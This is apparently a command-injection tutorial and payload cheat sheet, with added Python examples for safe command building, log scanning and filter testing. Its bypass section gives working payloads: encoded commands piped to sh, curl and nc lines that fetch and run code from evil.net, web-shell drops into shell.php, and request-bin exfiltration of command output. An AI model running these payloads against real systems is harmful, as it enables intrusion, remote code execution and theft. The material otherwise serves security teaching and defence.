Command Injection
Command injection is a vulnerability that lets an attacker run arbitrary operating-system commands through a vulnerable application. Because those commands run with the privileges of the application process, a single injection point can lead to full compromise of the host.
Example of vulnerable PHP code:
<?php
system('ping -c 2 '. $_GET['ip']);
?>
The script passes the ip parameter of the GET request straight into the system() function, which hands the concatenated string to a shell and runs the ping command with the user-supplied value; anything the user appends after the IP address is parsed by that same shell.
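As an added example that is not part of the original page, here is the same pattern in Python beside a hardened form. The sample inputs, function names and the shlex-based tokeniser (which only approximates a real shell) are constructed for illustration; shlex.quote() plays the role that escapeshellarg() plays in PHP.

```python
import ipaddress
import shlex

# Constructed sample inputs (not from the page): a benign value and the same
# value with an appended command, as it would arrive in ?ip=
BENIGN_IP = "127.0.0.1"
INJECTED_IP = "127.0.0.1; whoami"


def build_command_unsafe(ip: str) -> str:
    """Python analogue of the page's PHP one-liner: string concatenation whose
    result is handed to /bin/sh (os.system / subprocess with shell=True)."""
    return "ping -c 2 " + ip


def shell_tokens(command: str) -> list:
    """Approximate how a POSIX shell tokenises the command line; with
    punctuation_chars=True shlex reports ';', '|' and '&' as their own tokens,
    so an injected separator shows up as the start of a separate command."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    return list(lexer)


def is_valid_ip(value: str) -> bool:
    """Allowlist check: accept only a syntactically valid IPv4/IPv6 literal."""
    try:
        ipaddress.ip_address(value)
    except ValueError:
        return False
    return True


def build_command_safe(ip: str) -> list:
    """Hardened form: validate against the allowlist, then return an argv list
    for subprocess.run(argv, shell=False) so no shell ever parses the value."""
    if not is_valid_ip(ip):
        raise ValueError(f"rejected: not an IP address: {ip!r}")
    return ["ping", "-c", "2", ip]


def quoted_for_shell(ip: str) -> str:
    """Defence in depth when a shell is unavoidable: shlex.quote() is the Python
    counterpart of PHP's escapeshellarg(); the whole value becomes one argument."""
    return "ping -c 2 " + shlex.quote(ip)


if __name__ == "__main__":
    print("unsafe :", shell_tokens(build_command_unsafe(INJECTED_IP)))
    print("quoted :", shell_tokens(quoted_for_shell(INJECTED_IP)))
    print("safe   :", build_command_safe(BENIGN_IP))
    print("valid? :", is_valid_ip(INJECTED_IP))
```

The tokeniser output makes the defect visible: the unsafe string yields `;` and `whoami` as separate tokens, while the quoted form keeps the entire user value inside one argument. Validation against the expected shape remains the primary control; quoting is the fallback for code paths that cannot avoid a shell.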
Before looking at command injection attacks, we need to understand the following shell characters and command syntaxes.
Command syntaxes and characters
; (Semicolon): runs two or more commands on a single line, one after the other, regardless of whether the first succeeds.
whoami; pwd # runs whoami, then pwd
& (Ampersand): runs the first command in the background and starts the second immediately, so both run at the same time.
date & date # both commands print the same time
&& (Double ampersand): runs the second command only if the first succeeds (exit status 0).
command -v sqlmap && sqlmap -u target.com/vuln.php?id=7
| (Pipe): passes the output of the first command as input to the second.
cat /etc/passwd | grep -iw root
|| (Double pipe): runs the second command only if the first fails (non-zero exit status).
systemctl || service
Expansions (command substitution)
` (Backtick): the command between backticks is replaced by its output.
echo "You are currently logged in as `whoami`."
$() (Dollar-paren syntax): the modern form of command substitution, which can also be nested.
echo "Today's date is $(date)."
URL encoding
We can use %0A or %0D to perform command injection. They are the URL encodings of the line-ending characters \n (line feed) and \r (carriage return), so they act like pressing ENTER: the original command ends and whatever follows is read as a new command.
targetwebapp.com/vulnerable.php?ip=127.0.0.1%0Awhoami
targetwebapp.com/vulnerable.php?ip=127.0.0.1%0Dwhoami
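From the defender's side, the separators, substitutions and encoded line breaks described above are exactly what a log scanner should look for. The following Python is an added example, not part of the original page: it URL-decodes every query parameter in access-log lines and reports which indicators appear. It goes slightly beyond this section by also matching the variable, brace-list, hex and wildcard tricks listed under the bypass payloads. The log lines, parameter names and indicator names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample access-log lines (combined-log style, shortened; not real
# traffic). Line 2 carries the %0A newline trick, line 3 a ';' plus ${IFS}.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Mar/2024:12:00:01 +0000] "GET /vulnerable.php?ip=127.0.0.1 HTTP/1.1" 200 512
10.0.0.7 - - [10/Mar/2024:12:00:02 +0000] "GET /vulnerable.php?ip=127.0.0.1%0Awhoami HTTP/1.1" 200 640
10.0.0.7 - - [10/Mar/2024:12:00:03 +0000] "GET /vulnerable.php?ip=127.0.0.1%3Bcat%24%7BIFS%7D%2Fetc%2Fpasswd HTTP/1.1" 200 2048
10.0.0.9 - - [10/Mar/2024:12:00:04 +0000] "GET /search.php?q=cats+and+dogs HTTP/1.1" 200 300
"""

# Indicator patterns, each mapped to the shell feature from the cheat sheet.
INDICATORS = [
    ("separator", re.compile(r"[;|&\r\n]")),            # ; & && | || and %0A/%0D
    ("substitution", re.compile(r"`|\$\(")),             # `cmd` and $(cmd)
    ("variable", re.compile(r"\$[{@0-9A-Za-z_]")),       # ${IFS}, $9, $@, ${i}
    ("brace_list", re.compile(r"\{[^}]*,[^}]*\}")),      # {cat,/etc/passwd}
    ("hex_escape", re.compile(r"\\x[0-9A-Fa-f]{2}")),    # \x77\x68...
    ("glob", re.compile(r"[*?]")),                       # /et*/passw*, /et?/pas??d (noisier)
]

REQUEST_RE = re.compile(r'"(?:GET|POST|PUT|DELETE|HEAD|OPTIONS|PATCH) (\S+) HTTP/')


def decode_param(value: str) -> str:
    """parse_qsl already decoded one layer; decode once more so a double-encoded
    payload (%250A -> %0A -> newline) is still seen in its final form."""
    return unquote(value)


def scan_value(value: str) -> list:
    """Return the names of all indicators present in one decoded parameter."""
    return [name for name, pattern in INDICATORS if pattern.search(value)]


def scan_log(text: str) -> list:
    """Walk the log, decode every query parameter and report suspicious ones."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        query = urlsplit(match.group(1)).query
        for name, raw in parse_qsl(query, keep_blank_values=True):
            decoded = decode_param(raw)
            hits = scan_value(decoded)
            if hits:
                findings.append({"line": lineno, "param": name,
                                 "value": decoded, "indicators": hits})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['param']}={f['value']!r} -> {f['indicators']}")
```

The scanner matches on the decoded value, not the raw URL, which is what makes %0A and double-encoded variants visible; the glob pattern is the noisiest of the set and is best weighted lower or combined with another hit before alerting.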
Bypass payloads
Bypass without spaces
cat${IFS}/etc/passwd
{cat,/etc/passwd}
Bypass / (slash)
cat ${HOME:0:1}etc${HOME:0:1}passwd
cat ${PWD:0:1}etc${PWD:0:1}passwd
Bypass blacklisted words
Bypass using quotes
who'am'i
"who"ami
Bypass using backticks
wh``oa``mi
Bypassing with empty variables
wh$9oa$9mi # any digit 1-9 works: $1..$9 are unset positional parameters that expand to nothing ($0 expands to the shell's name, so it does not)
who$@ami
wh${i}oa${i}mi
Bypass using command substitution
w`echo ho`ami
w$(echo ho)ami
Bypassing with HEX encoding
echo -e '\x77\x68\x6f\x61\x6d\x69'|sh
`echo -e '\x77\x68\x6f\x61\x6d\x69'`
$(echo -e '\x77\x68\x6f\x61\x6d\x69')
cat `echo -e '\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'`
How to generate the hex values:
sudo apt install xxd -y
echo -n "/etc/passwd" | xxd -p -c 256 | sed 's/../\\x&/g'
Bypass using base64 encoding
`base64 -d <<<d2hvYW1pCg==`
$(base64 -d <<<d2hvYW1pCg==)
base64 -d <<<d2hvYW1pCg== |sh
Payload in the payload
If the filter removes blacklisted keywords instead of rejecting the request, we can use the "payload in the payload" method: after one pass of removal, the surviving halves join back into the keyword.
If the filter removes whoami:
whowhoamiami
If the filter removes rm:
rrmm
Bypass with wildcards
cat /et*/passw*
cat /et?/pas??d
Bypass using curl
curl evil.net/payload.txt|sh
sh -c "`curl evil.net/payload.txt`"
sh -c "$(curl evil.net/payload.txt)"
If the curl command is not found:
echo -e "GET /payload.txt HTTP/1.1\r\nHost: evil.net\r\nConnection: close\r\n\r\n" | nc evil.net 80 |sh
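All of the bypass payloads above are aimed at keyword blacklists. As an added example that is not from the page, this Python snippet runs several of those payload strings through a rejecting filter, a single-pass stripping filter, a repeated stripping filter and a positive allowlist, to show which control actually holds. The blacklist contents, payload labels and function names are constructed for the demonstration.

```python
import re

# A keyword/character blacklist of the kind the bypass tricks are aimed at
# (constructed for this example).
BLACKLIST = ("whoami", "rm", ";", "|", "&", " ")

# Payload strings reproduced from the cheat sheet, used here as test data.
PAYLOADS = {
    "quotes": "who'am'i",
    "empty_variable": "wh$9oa$9mi",
    "ifs_instead_of_space": "cat${IFS}/etc/passwd",
    "payload_in_payload": "whowhoamiami",
}

# Allowlist for this endpoint: a dotted-quad IPv4 literal and nothing else
# (ipaddress.ip_address would be the stricter production choice).
ALLOWED_IP = re.compile(r"(?:\d{1,3}\.){3}\d{1,3}")


def reject_if_blacklisted(value: str) -> bool:
    """Rejecting filter. Returns True when the value is let through."""
    return not any(bad in value for bad in BLACKLIST)


def strip_blacklisted_once(value: str) -> str:
    """Sanitising filter that deletes each blacklisted token in a single pass."""
    for bad in BLACKLIST:
        value = value.replace(bad, "")
    return value


def strip_until_stable(value: str) -> str:
    """Deleting repeatedly closes only the 'payload in the payload' hole; the
    quoting, empty-variable and ${IFS} payloads never contain a listed token."""
    while True:
        stripped = strip_blacklisted_once(value)
        if stripped == value:
            return value
        value = stripped


def allowlist_ip(value: str) -> bool:
    """Positive validation: the shape the parameter is supposed to have."""
    return ALLOWED_IP.fullmatch(value) is not None


def filter_report() -> dict:
    """For each payload, record which filters let it reach the shell."""
    report = {}
    for name, payload in PAYLOADS.items():
        report[name] = {
            "passes_reject_filter": reject_if_blacklisted(payload),
            "after_single_strip": strip_blacklisted_once(payload),
            "after_repeated_strip": strip_until_stable(payload),
            "passes_allowlist": allowlist_ip(payload),
        }
    return report


if __name__ == "__main__":
    for name, result in filter_report().items():
        print(name, result)
```

The report shows the pattern a reviewer should expect: the quoting, empty-variable and ${IFS} payloads pass every blacklist variant untouched because the shell, not the filter, is what reassembles them; only the positive allowlist rejects all four.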
Blind command injection (the injected command runs, but its output is not returned in the response)
Redirections
Truncate (overwrite the file)
curl evil.net/shell.txt >shell.php
Append
curl evil.net/shell.txt >>shell.php
Using the curl -o flag
curl evil.net/shell.txt -o shell.php
Using a request bin
curl "https://********.m.pipedream.net/?data=`whoami`"
curl -A "$(whoami)" "https://********.m.pipedream.net/"
Replace the host with your own request bin URL.
Time-based injection
if [ "$(whoami | cut -c 1)" = c ]; then sleep 5; fi
Try each possible character; a delayed response indicates a match.